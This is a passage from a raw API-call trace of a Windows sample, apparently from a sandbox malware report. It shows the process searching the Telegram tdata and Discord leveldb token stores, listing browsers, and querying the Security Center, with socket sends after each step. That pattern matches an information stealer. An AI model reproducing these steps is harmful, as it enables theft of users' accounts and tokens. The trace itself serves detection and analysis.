lpBuffer=0x19ed64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x3c [0265.490] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata\\", nBufferLength=0x105, lpBuffer=0x19ed38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata\\", lpFilePart=0x0) returned 0x3d [0265.490] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\telegram desktop\\tdata\\*"), lpFindFileData=0x19ef84 | out: lpFindFileData=0x19ef84*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0265.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f220) returned 1 [0265.507] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, lpBuffer=0x19ede4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x3c [0265.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f298) returned 1 [0265.508] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, lpBuffer=0x19eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x3c [0265.508] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata\\", nBufferLength=0x105, lpBuffer=0x19ed74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata\\", lpFilePart=0x0) returned 0x3d [0265.508] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\telegram desktop\\tdata\\*"), lpFindFileData=0x19efc0 | out: lpFindFileData=0x19efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0265.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f25c) returned 1 [0265.517] CoCreateGuid (in: pguid=0x19efcc | out: pguid=0x19efcc*(Data1=0x707b5bb1, Data2=0x36cc, Data3=0x4202, Data4=([0]=0x8d, [1]=0x52, [2]=0xf5, [3]=0xad, [4]=0x16, [5]=0xd3, [6]=0x3b, [7]=0xbf))) returned 0x0 [0265.517] CoCreateGuid (in: pguid=0x19eefc | out: pguid=0x19eefc*(Data1=0xdc127058, Data2=0xc6b4, Data3=0x4adb, Data4=([0]=0xbd, [1]=0x4, [2]=0x60, [3]=0xa6, [4]=0xcb, [5]=0xf4, [6]=0x80, [7]=0x2f))) returned 0x0 [0265.520] send (s=0x348, buf=0x319cf07*, len=167, flags=0) returned 167 [0265.522] recv (in: s=0x348, buf=0x2165550, len=8192, flags=0 | out: buf=0x2165550*) returned 128 [0265.591] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\WOW6432Node\\Clients\\StartMenuInternet", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c8 | out: phkResult=0x19f2c8*=0x300) returned 0x0 [0265.593] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x19f2f0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19f2ec, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x19f2f0*=0x1, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19f2ec*=0x1, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0265.594] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x23f25fc, lpcchName=0x19f30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEXPLORE.EXE", lpcchName=0x19f30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0265.594] RegOpenKeyExW (in: hKey=0x300, lpSubKey="IEXPLORE.EXE", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c8 | out: phkResult=0x19f2c8*=0x340) returned 0x0 [0265.594] RegQueryValueExW (in: hKey=0x340, lpValueName=0x0, lpReserved=0x0, lpType=0x19f2e8, lpData=0x0, lpcbData=0x19f2e4*=0x0 | out: lpType=0x19f2e8*=0x1, lpData=0x0, lpcbData=0x19f2e4*=0x24) returned 0x0 [0265.594] RegQueryValueExW (in: hKey=0x340, lpValueName=0x0, lpReserved=0x0, lpType=0x19f2e8, lpData=0x23f2928, lpcbData=0x19f2e4*=0x24 | out: lpType=0x19f2e8*=0x1, lpData="Internet Explorer", lpcbData=0x19f2e4*=0x24) returned 0x0 [0265.594] RegOpenKeyExW (in: hKey=0x340, lpSubKey="shell\\open\\command", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c8 | out: phkResult=0x19f2c8*=0x304) returned 0x0 [0265.595] RegQueryValueExW (in: hKey=0x304, lpValueName=0x0, lpReserved=0x0, lpType=0x19f2e8, lpData=0x0, lpcbData=0x19f2e4*=0x0 | out: lpType=0x19f2e8*=0x1, lpData=0x0, lpcbData=0x19f2e4*=0x60) returned 0x0 [0265.596] RegQueryValueExW (in: hKey=0x304, lpValueName=0x0, lpReserved=0x0, lpType=0x19f2e8, lpData=0x23f2b10, lpcbData=0x19f2e4*=0x60 | out: lpType=0x19f2e8*=0x1, lpData="C:\\Program Files\\Internet Explorer\\iexplore.exe", lpcbData=0x19f2e4*=0x60) returned 0x0 [0265.597] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Internet Explorer\\iexplore.exe", nBufferLength=0x105, lpBuffer=0x19edc4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Internet Explorer\\iexplore.exe", lpFilePart=0x0) returned 0x2f [0265.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f224) returned 1 [0265.597] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), fInfoLevelId=0x0, lpFileInformation=0x19f2a0 | out: lpFileInformation=0x19f2a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33517c70, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x33517c70, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x33517c70, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc74c0)) returned 1 [0265.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f220) returned 1 [0265.600] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Internet Explorer\\iexplore.exe", lpdwHandle=0x19f314 | out: lpdwHandle=0x19f314) returned 0xba4 [0265.791] GetFileVersionInfoW (in: lptstrFilename="C:\\Program Files\\Internet Explorer\\iexplore.exe", dwHandle=0x0, dwLen=0xba4, lpData=0x23f2cb8 | out: lpData=0x23f2cb8) returned 1 [0265.798] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x19f2e8, puLen=0x19f2e4 | out: lplpBuffer=0x19f2e8*=0x23f3284, puLen=0x19f2e4) returned 1 [0265.800] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x23f2d70, puLen=0x19f264) returned 1 [0265.800] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x23f2dc4, puLen=0x19f264) returned 1 [0265.800] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x23f2e08, puLen=0x19f264) returned 1 [0265.800] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x23f2e78, puLen=0x19f264) returned 1 [0265.800] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x23f2eb0, puLen=0x19f264) returned 1 [0265.800] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x23f2f34, puLen=0x19f264) returned 1 [0265.800] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x23f2f78, puLen=0x19f264) returned 1 [0265.800] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x23f2fc0, puLen=0x19f264) returned 1 [0265.800] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x0, puLen=0x19f264) returned 0 [0265.800] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x0, puLen=0x19f264) returned 0 [0265.801] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x0, puLen=0x19f264) returned 0 [0265.801] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x19f268, puLen=0x19f264 | out: lplpBuffer=0x19f268*=0x0, puLen=0x19f264) returned 0 [0265.801] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x19f25c, puLen=0x19f258 | out: lplpBuffer=0x19f25c*=0x23f3284, puLen=0x19f258) returned 1 [0265.802] VerLanguageNameW (in: wLang=0x409, szLang=0x19efec, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0265.845] VerQueryValueW (in: pBlock=0x23f2cb8, lpSubBlock="\\", lplpBuffer=0x19f26c, puLen=0x19f268 | out: lplpBuffer=0x19f26c*=0x23f2ce0, puLen=0x19f268) returned 1 [0265.848] CoCreateGuid (in: pguid=0x19efd4 | out: pguid=0x19efd4*(Data1=0x980088e2, Data2=0x5c66, Data3=0x4bc0, Data4=([0]=0xbc, [1]=0xd2, [2]=0x15, [3]=0x7d, [4]=0xd2, [5]=0xc8, [6]=0x57, [7]=0xfe))) returned 0x0 [0265.848] CoCreateGuid (in: pguid=0x19ef04 | out: pguid=0x19ef04*(Data1=0x9384df33, Data2=0x95bd, Data3=0x4c13, Data4=([0]=0x99, [1]=0xd7, [2]=0x4f, [3]=0x74, [4]=0x93, [5]=0xac, [6]=0xb1, [7]=0xcd))) returned 0x0 [0265.904] send (s=0x348, buf=0x319cf07*, len=306, flags=0) returned 306 [0265.906] recv (in: s=0x348, buf=0x2165550, len=8192, flags=0 | out: buf=0x2165550*) returned 128 [0266.073] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x19f0d4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0266.073] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\discord\\Local Storage\\leveldb", lpDst=0x19f0d4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb") returned 0x44 [0266.073] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x19ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x43 [0266.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f200) returned 1 [0266.074] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x19ed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x43 [0266.074] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\", nBufferLength=0x105, lpBuffer=0x19ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\", lpFilePart=0x0) returned 0x44 [0266.074] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\*.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\discord\\local storage\\leveldb\\*.log"), lpFindFileData=0x19ef28 | out: lpFindFileData=0x19ef28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0266.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1c4) returned 1 [0266.079] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x19ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x43 [0266.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f200) returned 1 [0266.079] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x19ed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x43 [0266.079] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\", nBufferLength=0x105, lpBuffer=0x19ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\", lpFilePart=0x0) returned 0x44 [0266.079] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\*.ldb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\discord\\local storage\\leveldb\\*.ldb"), lpFindFileData=0x19ef28 | out: lpFindFileData=0x19ef28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0266.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1c4) returned 1 [0266.088] CoCreateGuid (in: pguid=0x19efd0 | out: pguid=0x19efd0*(Data1=0xe6a497b1, Data2=0x5212, Data3=0x441b, Data4=([0]=0x96, [1]=0xd0, [2]=0x84, [3]=0x77, [4]=0x96, [5]=0xc2, [6]=0xc9, [7]=0x5c))) returned 0x0 [0266.090] CoCreateGuid (in: pguid=0x19ef00 | out: pguid=0x19ef00*(Data1=0xadc9726c, Data2=0xc886, Data3=0x4eb3, Data4=([0]=0xb0, [1]=0x23, [2]=0xd3, [3]=0x99, [4]=0x95, [5]=0x86, [6]=0x94, [7]=0xae))) returned 0x0 [0266.090] send (s=0x348, buf=0x319cf07*, len=205, flags=0) returned 205 [0266.091] recv (in: s=0x348, buf=0x2165550, len=8192, flags=0 | out: buf=0x2165550*) returned 128 [0266.145] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f288 | out: ppv=0x19f288*=0x601a94) returned 0x0 [0266.145] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f280 | out: pAptType=0x19f280*=1) returned 0x0 [0266.145] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f284 | out: ppvObject=0x19f284*=0x0) returned 0x80004002 [0266.145] IUnknown:Release (This=0x601a94) returned 0x1 [0266.147] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ebf0 | out: ppv=0x19ebf0*=0x54ba308) returned 0x0 [0266.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba308, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ee08 | out: ppvObject=0x19ee08*=0x0) returned 0x80004002 [0266.148] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba308, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee1c | out: ppvObject=0x19ee1c*=0x55426d0) returned 0x0 [0266.148] WbemDefPath:IUnknown:Release (This=0x54ba308) returned 0x0 [0266.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x55426d0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x55426d0) returned 0x0 [0266.149] WbemDefPath:IUnknown:QueryInterface (in: This=0x55426d0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e9f8 | out: ppvObject=0x19e9f8*=0x0) returned 0x80004002 [0266.149] WbemDefPath:IUnknown:QueryInterface (in: This=0x55426d0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e5ec | out: ppvObject=0x19e5ec*=0x0) returned 0x80004002 [0266.149] WbemDefPath:IUnknown:AddRef (This=0x55426d0) returned 0x3 [0266.149] WbemDefPath:IUnknown:QueryInterface (in: This=0x55426d0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e354 | out: ppvObject=0x19e354*=0x0) returned 0x80004002 [0266.149] WbemDefPath:IUnknown:QueryInterface (in: This=0x55426d0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e304 | out: ppvObject=0x19e304*=0x0) returned 0x80004002 [0266.149] WbemDefPath:IUnknown:QueryInterface (in: This=0x55426d0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e310 | out: ppvObject=0x19e310*=0x55448e8) returned 0x0 [0266.149] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55448e8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e318 | out: pCid=0x19e318*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.149] WbemDefPath:IUnknown:Release (This=0x55448e8) returned 0x3 [0266.149] CoGetContextToken (in: pToken=0x19e370 | out: pToken=0x19e370) returned 0x0 [0266.149] CoGetContextToken (in: pToken=0x19e778 | out: pToken=0x19e778) returned 0x0 [0266.149] WbemDefPath:IUnknown:QueryInterface (in: This=0x55426d0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e808 | out: ppvObject=0x19e808*=0x0) returned 0x80004002 [0266.150] WbemDefPath:IUnknown:Release (This=0x55426d0) returned 0x2 [0266.150] WbemDefPath:IUnknown:Release (This=0x55426d0) returned 0x1 [0266.150] CoGetContextToken (in: pToken=0x19f100 | out: pToken=0x19f100) returned 0x0 [0266.150] CoGetContextToken (in: pToken=0x19f060 | out: pToken=0x19f060) returned 0x0 [0266.150] WbemDefPath:IUnknown:QueryInterface (in: This=0x55426d0, riid=0x19f130*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f12c | out: ppvObject=0x19f12c*=0x55426d0) returned 0x0 [0266.150] WbemDefPath:IUnknown:AddRef (This=0x55426d0) returned 0x3 [0266.150] WbemDefPath:IUnknown:Release (This=0x55426d0) returned 0x2 [0266.150] WbemDefPath:IWbemPath:SetText (This=0x55426d0, uMode=0x4, pszPath="ROOT\\SecurityCenter") returned 0x0 [0266.150] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x55426d0, puCount=0x19f2b0 | out: puCount=0x19f2b0*=0x2) returned 0x0 [0266.150] WbemDefPath:IWbemPath:GetText (in: This=0x55426d0, lFlags=4, puBuffLength=0x19f2ac*=0x0, pszText=0x0 | out: puBuffLength=0x19f2ac*=0x18, pszText=0x0) returned 0x0 [0266.150] WbemDefPath:IWbemPath:GetText (in: This=0x55426d0, lFlags=4, puBuffLength=0x19f2ac*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f2ac*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.151] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x55426d0, puCount=0x19f29c | out: puCount=0x19f29c*=0x2) returned 0x0 [0266.151] WbemDefPath:IWbemPath:GetText (in: This=0x55426d0, lFlags=4, puBuffLength=0x19f298*=0x0, pszText=0x0 | out: puBuffLength=0x19f298*=0x18, pszText=0x0) returned 0x0 [0266.151] WbemDefPath:IWbemPath:GetText (in: This=0x55426d0, lFlags=4, puBuffLength=0x19f298*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f298*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.151] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f230 | out: ppv=0x19f230*=0x601a94) returned 0x0 [0266.151] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f228 | out: pAptType=0x19f228*=1) returned 0x0 [0266.151] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f22c | out: ppvObject=0x19f22c*=0x0) returned 0x80004002 [0266.151] IUnknown:Release (This=0x601a94) returned 0x1 [0266.152] CoGetClassObject (in: rclsid=0x6bdd2c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ee50 | out: ppv=0x19ee50*=0x5544678) returned 0x0 [0266.152] WbemLocator:IUnknown:QueryInterface (in: This=0x5544678, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x0) returned 0x80004002 [0266.153] WbemLocator:IClassFactory:CreateInstance (in: This=0x5544678, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f07c | out: ppvObject=0x19f07c*=0x54ba318) returned 0x0 [0266.153] WbemLocator:IUnknown:Release (This=0x5544678) returned 0x0 [0266.153] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba318, riid=0x6bf16c6c*(Data1=0x0, 